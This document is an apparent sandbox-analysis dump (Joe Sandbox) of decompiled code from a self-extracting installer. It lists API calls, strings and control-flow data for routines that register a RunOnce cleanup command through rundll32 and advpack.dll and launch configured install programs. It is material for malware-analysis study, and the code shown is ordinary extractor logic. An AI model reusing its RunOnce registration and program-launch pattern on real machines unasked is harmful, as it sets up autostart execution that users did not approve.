                                                                        				memset( &_v268, 0, 0x104);
                                                                        				memset( &_v528, 0, 0x104);
                                                                        				_t95 = _t94 + 0x18;
                                                                        				_t66 = 0;
                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                        				if(_t36 != 0) {
                                                                        					L24:
                                                                        					return E003D6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                        				}
                                                                        				_push(_t86);
                                                                        				_t87 = 0;
                                                                        				while(1) {
                                                                        					E003D171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                        					_t95 = _t95 + 0x10;
                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                        					if(_t41 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t87 = _t87 + 1;
                                                                        					if(_t87 < 0xc8) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				if(_t87 != 0xc8) {
                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                        					_t79 = _t84;
                                                                        					E003D658A( &_v528, _t84, "advpack.dll");
                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                        					_t84 = _t46;
                                                                        					if(_t84 == 0) {
                                                                        						L10:
                                                                        						if(GetModuleFileNameA( *0x3d9a3c,  &_v268, 0x104) == 0) {
                                                                        							L17:
                                                                        							_t36 = RegCloseKey(_v532);
                                                                        							L23:
                                                                        							_pop(_t86);
                                                                        							goto L24;
                                                                        						}
                                                                        						L11:
                                                                        						_t72 =  &_v268;
                                                                        						_t80 = _t72 + 1;
                                                                        						do {
                                                                        							_t49 =  *_t72;
                                                                        							_t72 = _t72 + 1;
                                                                        						} while (_t49 != 0);
                                                                        						_t73 = _t72 - _t80;
                                                                        						_t81 = 0x3d91e4;
                                                                        						do {
                                                                        							_t50 =  *_t81;
                                                                        							_t81 = _t81 + 1;
                                                                        						} while (_t50 != 0);
                                                                        						_t84 = _t73 + 0x50 + _t81 - 0x3d91e5;
                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x3d91e5);
                                                                        						if(_t90 != 0) {
                                                                        							 *0x3d8580 = _t66 ^ 0x00000001;
                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                        							if(_t66 == 0) {
                                                                        								_t54 = "%s /D:%s";
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        							E003D171E(_t90, _t84, _t54,  &_v268);
                                                                        							_t75 = _t90;
                                                                        							_t23 = _t75 + 1; // 0x1
                                                                        							_t79 = _t23;
                                                                        							do {
                                                                        								_t56 =  *_t75;
                                                                        								_t75 = _t75 + 1;
                                                                        							} while (_t56 != 0);
                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                        							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                        							RegCloseKey(_v532); // executed
                                                                        							_t36 = LocalFree(_t90);
                                                                        							goto L23;
                                                                        						}
                                                                        						_t79 = 0x4b5;
                                                                        						E003D44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                        					FreeLibrary(_t84); // executed
                                                                        					if(_t91 == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        						E003D658A( &_v268, 0x104, 0x3d1140);
                                                                        					}
                                                                        					goto L11;
                                                                        				}
                                                                        				_t36 = RegCloseKey(_v532);
                                                                        				 *0x3d8530 = _t66;
                                                                        				goto L23;
                                                                        			}

































                                                                        0x003d202a
                                                                        0x003d2035
                                                                        0x003d203c
                                                                        0x003d2041
                                                                        0x003d2050
                                                                        0x003d205f
                                                                        0x003d2064
                                                                        0x003d206f
                                                                        0x003d208c
                                                                        0x003d2094
                                                                        0x003d2257
                                                                        0x003d2266
                                                                        0x003d2266
                                                                        0x003d209a
                                                                        0x003d209b
                                                                        0x003d209d
                                                                        0x003d20aa
                                                                        0x003d20af
                                                                        0x003d20c9
                                                                        0x003d20d1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d20d3
                                                                        0x003d20da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d20da
                                                                        0x003d20e2
                                                                        0x003d2103
                                                                        0x003d210e
                                                                        0x003d2116
                                                                        0x003d2122
                                                                        0x003d2128
                                                                        0x003d212c
                                                                        0x003d2179
                                                                        0x003d2194
                                                                        0x003d21de
                                                                        0x003d21e4
                                                                        0x003d2256
                                                                        0x003d2256
                                                                        0x00000000
                                                                        0x003d2256
                                                                        0x003d2196
                                                                        0x003d2196
                                                                        0x003d219c
                                                                        0x003d219f
                                                                        0x003d219f
                                                                        0x003d21a1
                                                                        0x003d21a2
                                                                        0x003d21a6
                                                                        0x003d21a8
                                                                        0x003d21b0
                                                                        0x003d21b0
                                                                        0x003d21b2
                                                                        0x003d21b3
                                                                        0x003d21bc
                                                                        0x003d21c7
                                                                        0x003d21cb
                                                                        0x003d21f1
                                                                        0x003d21f6
                                                                        0x003d21fd
                                                                        0x003d21ff
                                                                        0x003d21ff
                                                                        0x003d2204
                                                                        0x003d2213
                                                                        0x003d2218
                                                                        0x003d221d
                                                                        0x003d221d
                                                                        0x003d2220
                                                                        0x003d2220
                                                                        0x003d2222
                                                                        0x003d2223
                                                                        0x003d2229
                                                                        0x003d223d
                                                                        0x003d2249
                                                                        0x003d2250
                                                                        0x00000000
                                                                        0x003d2250
                                                                        0x003d21d2
                                                                        0x003d21d9
                                                                        0x00000000
                                                                        0x003d21d9
                                                                        0x003d213a
                                                                        0x003d2141
                                                                        0x003d2144
                                                                        0x003d214c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d2163
                                                                        0x003d2172
                                                                        0x003d2172
                                                                        0x00000000
                                                                        0x003d2163
                                                                        0x003d20ea
                                                                        0x003d20f0
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 003D2050
                                                                        • memset.MSVCRT ref: 003D205F
                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 003D208C
                                                                          • Part of subcall function 003D171E: _vsnprintf.MSVCRT ref: 003D1750
                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D20C9
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D20EA
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 003D2103
                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D2122
                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 003D2134
                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D2144
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 003D215B
                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D218C
                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D21C1
                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D21E4
                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 003D223D
                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D2249
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003D2250
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                        • String ID: %s /D:%s$C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                        • API String ID: 178549006-2414900631
                                                                        • Opcode ID: 6bf9246dce88eeb11b82602add57da8cc4fa0c834b5caa798fa0f0415e016d49
                                                                        • Instruction ID: 377a36b247df7bbf0907b0a970c92e91b9a73907508cdac4eabad18b79aca28c
                                                                        • Opcode Fuzzy Hash: 6bf9246dce88eeb11b82602add57da8cc4fa0c834b5caa798fa0f0415e016d49
                                                                        • Instruction Fuzzy Hash: 1A51F573A01214ABDB239B60FC49FEB773CEB55700F0041A7FA45E7251DA719E898A60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 36 3d3ba2-3d3bd9 37 3d3bfd-3d3bff 36->37 38 3d3bdb-3d3bee call 3d468f 36->38 40 3d3c03-3d3c28 memset 37->40 44 3d3bf4-3d3bf7 38->44 45 3d3d13-3d3d30 call 3d44b9 38->45 42 3d3c2e-3d3c40 call 3d468f 40->42 43 3d3d35-3d3d48 call 3d1781 40->43 42->45 54 3d3c46-3d3c49 42->54 49 3d3d4d-3d3d52 43->49 44->37 44->45 55 3d3f4d 45->55 52 3d3d9e-3d3db6 call 3d1ae8 49->52 53 3d3d54-3d3d6c call 3d468f 49->53 52->55 69 3d3dbc-3d3dc2 52->69 53->45 65 3d3d6e-3d3d75 53->65 54->45 57 3d3c4f-3d3c56 54->57 59 3d3f4f-3d3f63 call 3d6ce0 55->59 61 3d3c58-3d3c5e 57->61 62 3d3c60-3d3c65 57->62 66 3d3c6e-3d3c73 61->66 67 3d3c75-3d3c7c 62->67 68 3d3c67-3d3c6d 62->68 71 3d3d7b-3d3d98 CompareStringA 65->71 72 3d3fda-3d3fe1 65->72 73 3d3c87-3d3c89 66->73 67->73 76 3d3c7e-3d3c82 67->76 68->66 74 3d3dc4-3d3dce 69->74 75 3d3de6-3d3de8 69->75 71->52 71->72 80 3d3fe8-3d3fea 72->80 81 3d3fe3 call 3d2267 72->81 73->49 77 3d3c8f-3d3c98 73->77 74->75 82 3d3dd0-3d3dd7 74->82 78 3d3dee-3d3df5 75->78 79 3d3f0b-3d3f15 call 3d3fef 75->79 76->73 84 3d3c9a-3d3c9c 77->84 85 3d3cf1-3d3cf3 77->85 86 3d3fab-3d3fd2 call 3d44b9 LocalFree 78->86 87 3d3dfb-3d3dfd 78->87 96 3d3f1a-3d3f1c 79->96 80->59 81->80 82->75 83 3d3dd9-3d3ddb 82->83 83->78 90 3d3ddd-3d3de1 call 3d202a 83->90 92 3d3c9e-3d3ca3 84->92 93 3d3ca5-3d3ca7 84->93 85->52 95 3d3cf9-3d3d11 call 3d468f 85->95 86->55 87->79 94 3d3e03-3d3e0a 87->94 90->75 101 3d3cb2-3d3cc5 call 3d468f 92->101 93->55 102 3d3cad 93->102 94->79 103 3d3e10-3d3e19 call 3d6495 94->103 95->45 95->49 97 3d3f1e-3d3f2d LocalFree 96->97 98 3d3f46-3d3f47 LocalFree 96->98 105 3d3fd7-3d3fd9 97->105 106 3d3f33-3d3f3b 97->106 98->55 101->45 112 3d3cc7-3d3ce8 CompareStringA 101->112 102->101 113 3d3e1f-3d3e36 GetProcAddress 103->113 114 3d3f92-3d3fa9 call 3d44b9 103->114 105->72 106->40 112->85 115 3d3cea-3d3ced 112->115 116 3d3e3c-3d3e80 113->116 117 3d3f64-3d3f76 call 3d44b9 FreeLibrary 113->117 123 3d3f7c-3d3f90 LocalFree call 3d6285 114->123 115->85 121 3d3e8b-3d3e94 116->121 122 3d3e82-3d3e87 116->122 117->123 125 3d3e9f-3d3ea2 121->125 126 3d3e96-3d3e9b 121->126 122->121 123->55 127 3d3ead-3d3eb6 125->127 128 3d3ea4-3d3ea9 125->128 126->125 130 3d3eb8-3d3ebd 127->130 131 3d3ec1-3d3ec3 127->131 128->127 130->131 133 3d3ece-3d3eec 131->133 134 3d3ec5-3d3eca 131->134 137 3d3eee-3d3ef3 133->137 138 3d3ef5-3d3efd 133->138 134->133 137->138 139 3d3eff-3d3f09 FreeLibrary 138->139 140 3d3f40 FreeLibrary 138->140 139->97 140->98
                                                                        C-Code - Quality: 82%
                                                                        			E003D3BA2() {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				short _v300;
                                                                        				intOrPtr _v304;
                                                                        				void _v348;
                                                                        				char _v352;
                                                                        				intOrPtr _v356;
                                                                        				signed int _v360;
                                                                        				short _v364;
                                                                        				char* _v368;
                                                                        				intOrPtr _v372;
                                                                        				void* _v376;
                                                                        				intOrPtr _v380;
                                                                        				char _v384;
                                                                        				signed int _v388;
                                                                        				intOrPtr _v392;
                                                                        				signed int _v396;
                                                                        				signed int _v400;
                                                                        				signed int _v404;
                                                                        				void* _v408;
                                                                        				void* _v424;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t69;
                                                                        				signed int _t76;
                                                                        				void* _t77;
                                                                        				signed int _t79;
                                                                        				short _t96;
                                                                        				signed int _t97;
                                                                        				intOrPtr _t98;
                                                                        				signed int _t101;
                                                                        				signed int _t104;
                                                                        				signed int _t108;
                                                                        				int _t112;
                                                                        				void* _t115;
                                                                        				signed char _t118;
                                                                        				void* _t125;
                                                                        				signed int _t127;
                                                                        				void* _t128;
                                                                        				struct HINSTANCE__* _t129;
                                                                        				void* _t130;
                                                                        				short _t137;
                                                                        				char* _t140;
                                                                        				signed char _t144;
                                                                        				signed char _t145;
                                                                        				signed int _t149;
                                                                        				void* _t150;
                                                                        				void* _t151;
                                                                        				signed int _t153;
                                                                        				void* _t155;
                                                                        				void* _t156;
                                                                        				signed int _t157;
                                                                        				signed int _t162;
                                                                        				signed int _t164;
                                                                        				void* _t165;
                                                                        
                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                        				_t69 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t69 ^ _t164;
                                                                        				_t153 = 0;
                                                                        				 *0x3d9124 =  *0x3d9124 & 0;
                                                                        				_t149 = 0;
                                                                        				_v388 = 0;
                                                                        				_v384 = 0;
                                                                        				_t165 =  *0x3d8a28 - _t153; // 0x0
                                                                        				if(_t165 != 0) {
                                                                        					L3:
                                                                        					_t127 = 0;
                                                                        					_v392 = 0;
                                                                        					while(1) {
                                                                        						_v400 = _v400 & 0x00000000;
                                                                        						memset( &_v348, 0, 0x44);
                                                                        						_t164 = _t164 + 0xc;
                                                                        						_v348 = 0x44;
                                                                        						if( *0x3d8c42 != 0) {
                                                                        							goto L26;
                                                                        						}
                                                                        						_t146 =  &_v396;
                                                                        						_t115 = E003D468F("SHOWWINDOW",  &_v396, 4);
                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                        							L25:
                                                                        							_t146 = 0x4b1;
                                                                        							E003D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        							 *0x3d9124 = 0x80070714;
                                                                        							goto L62;
                                                                        						} else {
                                                                        							if(_v396 != 1) {
                                                                        								__eflags = _v396 - 2;
                                                                        								if(_v396 != 2) {
                                                                        									_t137 = 3;
                                                                        									__eflags = _v396 - _t137;
                                                                        									if(_v396 == _t137) {
                                                                        										_v304 = 1;
                                                                        										_v300 = _t137;
                                                                        									}
                                                                        									goto L14;
                                                                        								}
                                                                        								_push(6);
                                                                        								_v304 = 1;
                                                                        								_pop(0);
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_v304 = 1;
                                                                        								L11:
                                                                        								_v300 = 0;
                                                                        								L14:
                                                                        								if(_t127 != 0) {
                                                                        									L27:
                                                                        									_t155 = 1;
                                                                        									__eflags = _t127 - 1;
                                                                        									if(_t127 != 1) {
                                                                        										L31:
                                                                        										_t132 =  &_v280;
                                                                        										_t76 = E003D1AE8( &_v280,  &_v408,  &_v404); // executed
                                                                        										__eflags = _t76;
                                                                        										if(_t76 == 0) {
                                                                        											L62:
                                                                        											_t77 = 0;
                                                                        											L63:
                                                                        											_pop(_t150);
                                                                        											_pop(_t156);
                                                                        											_pop(_t128);
                                                                        											return E003D6CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                        										}
                                                                        										_t157 = _v404;
                                                                        										__eflags = _t149;
                                                                        										if(_t149 != 0) {
                                                                        											L37:
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												L57:
                                                                        												_t151 = _v408;
                                                                        												_t146 =  &_v352;
                                                                        												_t130 = _t151; // executed
                                                                        												_t79 = E003D3FEF(_t130,  &_v352); // executed
                                                                        												__eflags = _t79;
                                                                        												if(_t79 == 0) {
                                                                        													L61:
                                                                        													LocalFree(_t151);
                                                                        													goto L62;
                                                                        												}
                                                                        												L58:
                                                                        												LocalFree(_t151);
                                                                        												_t127 = _t127 + 1;
                                                                        												_v396 = _t127;
                                                                        												__eflags = _t127 - 2;
                                                                        												if(_t127 >= 2) {
                                                                        													_t155 = 1;
                                                                        													__eflags = 1;
                                                                        													L69:
                                                                        													__eflags =  *0x3d8580;
                                                                        													if( *0x3d8580 != 0) {
                                                                        														E003D2267();
                                                                        													}
                                                                        													_t77 = _t155;
                                                                        													goto L63;
                                                                        												}
                                                                        												_t153 = _v392;
                                                                        												_t149 = _v388;
                                                                        												continue;
                                                                        											}
                                                                        											L38:
                                                                        											__eflags =  *0x3d8180;
                                                                        											if( *0x3d8180 == 0) {
                                                                        												_t146 = 0x4c7;
                                                                        												E003D44B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                        												LocalFree(_v424);
                                                                        												 *0x3d9124 = 0x8007042b;
                                                                        												goto L62;
                                                                        											}
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											__eflags =  *0x3d9a34 & 0x00000004;
                                                                        											if(__eflags == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											_t129 = E003D6495(_t127, _t132, _t157, __eflags);
                                                                        											__eflags = _t129;
                                                                        											if(_t129 == 0) {
                                                                        												_t146 = 0x4c8;
                                                                        												E003D44B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                        												L65:
                                                                        												LocalFree(_v408);
                                                                        												 *0x3d9124 = E003D6285();
                                                                        												goto L62;
                                                                        											}
                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                        											_v404 = _t146;
                                                                        											__eflags = _t146;
                                                                        											if(_t146 == 0) {
                                                                        												_t146 = 0x4c9;
                                                                        												__eflags = 0;
                                                                        												E003D44B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                        												FreeLibrary(_t129);
                                                                        												goto L65;
                                                                        											}
                                                                        											__eflags =  *0x3d8a30;
                                                                        											_t151 = _v408;
                                                                        											_v384 = 0;
                                                                        											_v368 =  &_v280;
                                                                        											_t96 =  *0x3d9a40; // 0x3
                                                                        											_v364 = _t96;
                                                                        											_t97 =  *0x3d8a38 & 0x0000ffff;
                                                                        											_v380 = 0x3d9154;
                                                                        											_v376 = _t151;
                                                                        											_v372 = 0x3d91e4;
                                                                        											_v360 = _t97;
                                                                        											if( *0x3d8a30 != 0) {
                                                                        												_t97 = _t97 | 0x00010000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t144 =  *0x3d9a34; // 0x1
                                                                        											__eflags = _t144 & 0x00000008;
                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                        												_t97 = _t97 | 0x00020000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t144 & 0x00000010;
                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                        												_t97 = _t97 | 0x00040000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t145 =  *0x3d8d48; // 0x0
                                                                        											__eflags = _t145 & 0x00000040;
                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                        												_t97 = _t97 | 0x00080000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t145;
                                                                        											if(_t145 < 0) {
                                                                        												_t104 = _t97 | 0x00100000;
                                                                        												__eflags = _t104;
                                                                        												_v360 = _t104;
                                                                        											}
                                                                        											_t98 =  *0x3d9a38; // 0x0
                                                                        											_v356 = _t98;
                                                                        											_t130 = _t146;
                                                                        											 *0x3da288( &_v384);
                                                                        											_t101 = _v404();
                                                                        											__eflags = _t164 - _t164;
                                                                        											if(_t164 != _t164) {
                                                                        												_t130 = 4;
                                                                        												asm("int 0x29");
                                                                        											}
                                                                        											 *0x3d9124 = _t101;
                                                                        											_push(_t129);
                                                                        											__eflags = _t101;
                                                                        											if(_t101 < 0) {
                                                                        												FreeLibrary();
                                                                        												goto L61;
                                                                        											} else {
                                                                        												FreeLibrary();
                                                                        												_t127 = _v400;
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags =  *0x3d9a40 - 1; // 0x3
                                                                        										if(__eflags == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags =  *0x3d8a20;
                                                                        										if( *0x3d8a20 == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags = _t157;
                                                                        										if(_t157 != 0) {
                                                                        											goto L38;
                                                                        										}
                                                                        										_v388 = 1;
                                                                        										E003D202A(_t146); // executed
                                                                        										goto L37;
                                                                        									}
                                                                        									_t146 =  &_v280;
                                                                        									_t108 = E003D468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                        									__eflags = _t108;
                                                                        									if(_t108 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									__eflags =  *0x3d8c42;
                                                                        									if( *0x3d8c42 != 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                        									__eflags = _t112 == 0;
                                                                        									if(_t112 == 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								_t118 =  *0x3d8a38; // 0x0
                                                                        								if(_t118 == 0) {
                                                                        									L23:
                                                                        									if(_t153 != 0) {
                                                                        										goto L31;
                                                                        									}
                                                                        									_t146 =  &_v276;
                                                                        									if(E003D468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                        										goto L27;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                        									__eflags = _t118 & 0x00000002;
                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									_t140 = "USRQCMD";
                                                                        									L20:
                                                                        									_t146 =  &_v276;
                                                                        									if(E003D468F(_t140,  &_v276, 0x104) == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                        										_t153 = 1;
                                                                        										_v388 = 1;
                                                                        									}
                                                                        									goto L23;
                                                                        								}
                                                                        								_t140 = "ADMQCMD";
                                                                        								goto L20;
                                                                        							}
                                                                        						}
                                                                        						L26:
                                                                        						_push(_t130);
                                                                        						_t146 = 0x104;
                                                                        						E003D1781( &_v276, 0x104, _t130, 0x3d8c42);
                                                                        						goto L27;
                                                                        					}
                                                                        				}
                                                                        				_t130 = "REBOOT";
                                                                        				_t125 = E003D468F(_t130, 0x3d9a2c, 4);
                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                        					goto L25;
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        			}





























































                                                                        0x003d3baa
                                                                        0x003d3bb0
                                                                        0x003d3bb7
                                                                        0x003d3bc0
                                                                        0x003d3bc2
                                                                        0x003d3bc9
                                                                        0x003d3bcb
                                                                        0x003d3bcf
                                                                        0x003d3bd3
                                                                        0x003d3bd9
                                                                        0x003d3bfd
                                                                        0x003d3bfd
                                                                        0x003d3bff
                                                                        0x003d3c03
                                                                        0x003d3c03
                                                                        0x003d3c11
                                                                        0x003d3c16
                                                                        0x003d3c19
                                                                        0x003d3c28
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3c30
                                                                        0x003d3c39
                                                                        0x003d3c40
                                                                        0x003d3d13
                                                                        0x003d3d15
                                                                        0x003d3d21
                                                                        0x003d3d26
                                                                        0x00000000
                                                                        0x003d3c4f
                                                                        0x003d3c56
                                                                        0x003d3c60
                                                                        0x003d3c65
                                                                        0x003d3c77
                                                                        0x003d3c78
                                                                        0x003d3c7c
                                                                        0x003d3c7e
                                                                        0x003d3c82
                                                                        0x003d3c82
                                                                        0x00000000
                                                                        0x003d3c7c
                                                                        0x003d3c67
                                                                        0x003d3c69
                                                                        0x003d3c6d
                                                                        0x00000000
                                                                        0x003d3c58
                                                                        0x003d3c58
                                                                        0x003d3c6e
                                                                        0x003d3c6e
                                                                        0x003d3c87
                                                                        0x003d3c89
                                                                        0x003d3d4d
                                                                        0x003d3d4f
                                                                        0x003d3d50
                                                                        0x003d3d52
                                                                        0x003d3d9e
                                                                        0x003d3da8
                                                                        0x003d3daf
                                                                        0x003d3db4
                                                                        0x003d3db6
                                                                        0x003d3f4d
                                                                        0x003d3f4d
                                                                        0x003d3f4f
                                                                        0x003d3f56
                                                                        0x003d3f57
                                                                        0x003d3f58
                                                                        0x003d3f63
                                                                        0x003d3f63
                                                                        0x003d3dbc
                                                                        0x003d3dc0
                                                                        0x003d3dc2
                                                                        0x003d3de6
                                                                        0x003d3de6
                                                                        0x003d3de8
                                                                        0x003d3f0b
                                                                        0x003d3f0b
                                                                        0x003d3f0f
                                                                        0x003d3f13
                                                                        0x003d3f15
                                                                        0x003d3f1a
                                                                        0x003d3f1c
                                                                        0x003d3f46
                                                                        0x003d3f47
                                                                        0x00000000
                                                                        0x003d3f47
                                                                        0x003d3f1e
                                                                        0x003d3f1f
                                                                        0x003d3f25
                                                                        0x003d3f26
                                                                        0x003d3f2a
                                                                        0x003d3f2d
                                                                        0x003d3fd9
                                                                        0x003d3fd9
                                                                        0x003d3fda
                                                                        0x003d3fda
                                                                        0x003d3fe1
                                                                        0x003d3fe3
                                                                        0x003d3fe3
                                                                        0x003d3fe8
                                                                        0x00000000
                                                                        0x003d3fe8
                                                                        0x003d3f33
                                                                        0x003d3f37
                                                                        0x00000000
                                                                        0x003d3f37
                                                                        0x003d3dee
                                                                        0x003d3dee
                                                                        0x003d3df5
                                                                        0x003d3fad
                                                                        0x003d3fb9
                                                                        0x003d3fc2
                                                                        0x003d3fc8
                                                                        0x00000000
                                                                        0x003d3fc8
                                                                        0x003d3dfb
                                                                        0x003d3dfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3e03
                                                                        0x003d3e0a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3e15
                                                                        0x003d3e17
                                                                        0x003d3e19
                                                                        0x003d3f94
                                                                        0x003d3fa4
                                                                        0x003d3f7c
                                                                        0x003d3f80
                                                                        0x003d3f8b
                                                                        0x00000000
                                                                        0x003d3f8b
                                                                        0x003d3e2c
                                                                        0x003d3e30
                                                                        0x003d3e34
                                                                        0x003d3e36
                                                                        0x003d3f69
                                                                        0x003d3f6e
                                                                        0x003d3f70
                                                                        0x003d3f76
                                                                        0x00000000
                                                                        0x003d3f76
                                                                        0x003d3e3c
                                                                        0x003d3e43
                                                                        0x003d3e47
                                                                        0x003d3e52
                                                                        0x003d3e56
                                                                        0x003d3e5c
                                                                        0x003d3e61
                                                                        0x003d3e68
                                                                        0x003d3e70
                                                                        0x003d3e74
                                                                        0x003d3e7c
                                                                        0x003d3e80
                                                                        0x003d3e82
                                                                        0x003d3e82
                                                                        0x003d3e87
                                                                        0x003d3e87
                                                                        0x003d3e8b
                                                                        0x003d3e91
                                                                        0x003d3e94
                                                                        0x003d3e96
                                                                        0x003d3e96
                                                                        0x003d3e9b
                                                                        0x003d3e9b
                                                                        0x003d3e9f
                                                                        0x003d3ea2
                                                                        0x003d3ea4
                                                                        0x003d3ea4
                                                                        0x003d3ea9
                                                                        0x003d3ea9
                                                                        0x003d3ead
                                                                        0x003d3eb3
                                                                        0x003d3eb6
                                                                        0x003d3eb8
                                                                        0x003d3eb8
                                                                        0x003d3ebd
                                                                        0x003d3ebd
                                                                        0x003d3ec1
                                                                        0x003d3ec3
